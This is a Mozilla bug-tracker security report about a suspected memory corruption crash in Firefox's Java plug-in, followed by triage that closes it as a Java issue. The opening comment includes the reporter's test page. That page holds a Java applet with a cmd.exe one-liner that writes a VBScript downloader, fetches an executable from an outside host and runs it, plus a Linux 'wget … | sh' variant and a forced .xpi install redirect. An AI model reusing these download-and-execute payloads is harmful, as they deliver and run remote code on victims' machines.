Closed Bug 904053 Opened 11 years ago Closed 8 years ago

WINDOWS possible memory corruption with INNERHTML and applet code when onmousemove

Categories

(Core Graveyard :: Plug-ins, defect)

22 Branch
x86
Windows 7
defect
Not set
critical

Tracking

(Not tracked)

RESOLVED INVALID

People

(Reporter: jordi.chancel, Unassigned)

Details

(4 keywords, Whiteboard: potentially exploitable java bug)

Crash Data

Attachments

(2 files, 4 obsolete files)

88.91 KB, application/octet-stream
Details
1.45 MB, application/octet-stream
Details
Attached file local 0day.zip (obsolete) —
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0 (Beta/Release) Build ID: 20130729175331 Steps to reproduce: https://crash-stats.mozilla.com/report/index/30b0bd53-5ec5-45d5-9be5-5cfde2130812 with this code sometime mozilla firefox don't crash but sometime mozilla firefox crash with evidence of memory corruption. On a session test i have found a possible critical memory corruption on windows when you do document.getElementById("jo").innerHTML = "<iframe src='http://127.0.0.1/Vulnerability%20Research/test%20remote%20xpi%20cover%20by%20persistant%20select/hack.html'></iframe><div ><font color=white>=</font></div>"; on onmousemove ( http://127.0.0.1/Vulnerability%20Research/test%20remote%20xpi%20cover%20by%20persistant%20select/hack.html lead on this code : <applet width='1' height='1' code='Client.class' archive='Client.jar'> <param name='windows1' value='cmd.exe /c echo Const adTypeBinary = 1 > %temp%\winconfig.vbs & echo Const adSaveCreateOverWrite = 2 >> %temp%\winconfig.vbs & echo Dim S >> %temp%\winconfig.vbs & echo Dim A >> %temp%\winconfig.vbs & echo Dim DTNDTN >> %temp%\winconfig.vbs & echo S = "ADODB" >> %temp%\winconfig.vbs & echo A = ".Stream" >> %temp%\winconfig.vbs & echo Set DTNDTN = CreateObject(S+A) >> %temp%\winconfig.vbs & echo DTNDTN.Type = adTypeBinary >> %temp%\winconfig.vbs & echo DTNDTN.Open >> %temp%\winconfig.vbs & echo DTNDTN.Write BinaryGetURL(Wscript.Arguments(0)) >> %temp%\winconfig.vbs & echo DTNDTN.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> %temp%\winconfig.vbs & echo Function BinaryGetURL(URL) >> %temp%\winconfig.vbs & echo Dim Http >> %temp%\winconfig.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> %temp%\winconfig.vbs & echo Http.Open "GET", URL, False >> %temp%\winconfig.vbs & echo Http.Send >> %temp%\winconfig.vbs & echo BinaryGetURL = Http.ResponseBody >> %temp%\winconfig.vbs & echo End Function >> %temp%\winconfig.vbs & echo Set shell = CreateObject("WScript.Shell") >> %temp%\winconfig.vbs & echo shell.Run "%temp%\update.exe" >> %temp%\winconfig.vbs & start %temp%\winconfig.vbs http://www.alternativ-testing.fr/calc.exe %temp%\update.exe'> <param name='windows2' value=''> <param name='unix1' value=""> <param name='unix2' value=""> <param name='linux1' value="wget http://www.alternativ-testing.fr/calc.exe -O- | sh"> <param name='linux2' value=""> </applet> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Firefox 0day</title> </head> <body> <body bgcolor="black" text="black" link="blue" vlink="purple" alink="red"> <p>&nbsp;</p> </body> <script language="JavaScript">navigator.geolocation.getCurrentPosition(LocationOK, LocationKO); function LocationOK(position) { var latitude = position.coords.latitude; var longitude = position.coords.longitude; alert('Location: ' + latitude + ', ' + longitude); } function LocationKO() { alert('You\'re lost !'); } </script> </body> </html> <script> document.location ='./hackcalc.xpi'; </script> memory corruption is observed. Actual results: Mozilla Firefox crash Expected results: mozilla firefox lead to crash with evidence of memory corruption
Attachment #788926 - Attachment is obsolete: true
Crash Signature: https://crash-stats.mozilla.com/report/index/30b0bd53-5ec5-45d5-9be5-5cfde2130812
Attached file 0day.zip (obsolete) —
Attached video Windowd Exemple (obsolete) —
Attached file local 0day.zip (obsolete) —
Attachment #788940 - Attachment is obsolete: true
The stack in bp-30b0bd53-5ec5-45d5-9be5-5cfde2130812 looks like the crash is in the Java plug-in (npjp2.dll). -> Plug-ins for further triage
Severity: normal → critical
Component: General → Plug-ins
Keywords: crash, testcase
Jordi, which version of Java are you using?
Flags: needinfo?(jordi.chancel)
last version of java please test the testcase localy and close/open firefox for each test.
Flags: needinfo?(jordi.chancel)
Jordi, please write the exact version so that future readers of this bug know which version was meant by "last version". Thanks
java(tm) plateform se 7 u25 10.25.2.17
Flags: sec-bounty?
Crash Signature: https://crash-stats.mozilla.com/report/index/30b0bd53-5ec5-45d5-9be5-5cfde2130812 → [@ npjp2.dll@0xc2bc ]
Attachment #789013 - Attachment mime type: application/octet-stream → video/mp4
Attachment #789018 - Attachment mime type: application/octet-stream → application/java-archive
multiple crash lead to access violation read on address 0x00000004 but some crash like https://crash-stats.mozilla.com/report/index/a009099a-1fe5-4e07-94b3-365742130813 and https://crash-stats.mozilla.com/report/index/30b0bd53-5ec5-45d5-9be5-5cfde2130812 lead to evidence of memory corruption
https://crash-stats.mozilla.com/report/index/a009099a-1fe5-4e07-94b3-365742130813 Crash Reason EXCEPTION_ACCESS_VIOLATION_READ Crash Address 0x2f6d6f63 ----------- https://crash-stats.mozilla.com/report/index/30b0bd53-5ec5-45d5-9be5-5cfde2130812 Crash Reason EXCEPTION_ACCESS_VIOLATION_EXEC Crash Address 0x2ffdb71
Flags: needinfo?(mwobensmith)
The steps to reproduce this bug are unclear. Please create steps, in the order to be executed. Is this test run locally or from a web server? What file is to be opened first? I ran the files myself - both from a web server and locally. When run from a web server, I see the Firefox doorhanger dialogs for geolocation and XPI install repeatedly, but no crash. When run locally, I see a dialog that says: "Windows cannot find 'C:\Users\myusername\AppData\Local\Temp\winconfig.vbs'. Make sure you typed the name correctly, and then try again." In both cases, I see no crash. I'm using the latest JRE 7u25 on Win7 as well.
Flags: needinfo?(mwobensmith)
Jordi, Matt cannot reproduce this. Can you work with him to answer his questions? Thanks.
Flags: needinfo?(jordi.chancel)
Attached file local 0day
Go to 1.html and move the mouse on this page , if firefox don't crash this time please close firefox and open it and retry all step (move the move on 1.html). I repeat this testcase work only for windows.
Attachment #789013 - Attachment is obsolete: true
Attachment #789018 - Attachment is obsolete: true
Flags: needinfo?(jordi.chancel)
1.html should be open localy for test the cash but firefox can crashed remotely most rarely.
Attached file Windows exemple
Jordi, what exact version of Windows 7 are you running? Go to command line, type "ver" and tell me what that says.
The crash itself seems to be pretty common with Java, see https://crash-stats.mozilla.com/report/list?signature=npjp2.dll%400xc2bc
I'm going to confirm that there does appear to be a real Java bug here based on the crash-stats reports in comment 17, even if we're having trouble reproducing with this particular testcase. All the crashes, even the ones Jordi links to, appear to be x86 and not 64-bit despite the user agent in comment 0. Would be interesting to try in Chrome, although there could be some browser/plugin interaction that's involved rather than a pure Java bug. This is probably worth blocklisting Java 1.7 u25 over. I know we're going to blocklist it in Fx26 anyway, but we could do it now based on this.
Status: UNCONFIRMED → NEW
Ever confirmed: true
Flags: needinfo?(benjamin)
Keywords: sec-vector
Hardware: x86_64 → x86
Whiteboard: potentially exploitable java bug
Has anyone filed this with Oracle? We're blocking Java in bug 914690 (Fx24+) and I don't think this bug changes that calculation at all.
Flags: needinfo?(benjamin)
don't crash on google chrome.
this is a java bug so not eligible for our bounty.
Flags: sec-bounty? → sec-bounty-
Group: core-security → dom-core-security
I'm going to close this in our bug tracker, but leave it private since I don't see confirmation that this was ever reported to Oracle.
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → INVALID
Group: dom-core-security
Product: Core → Core Graveyard
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: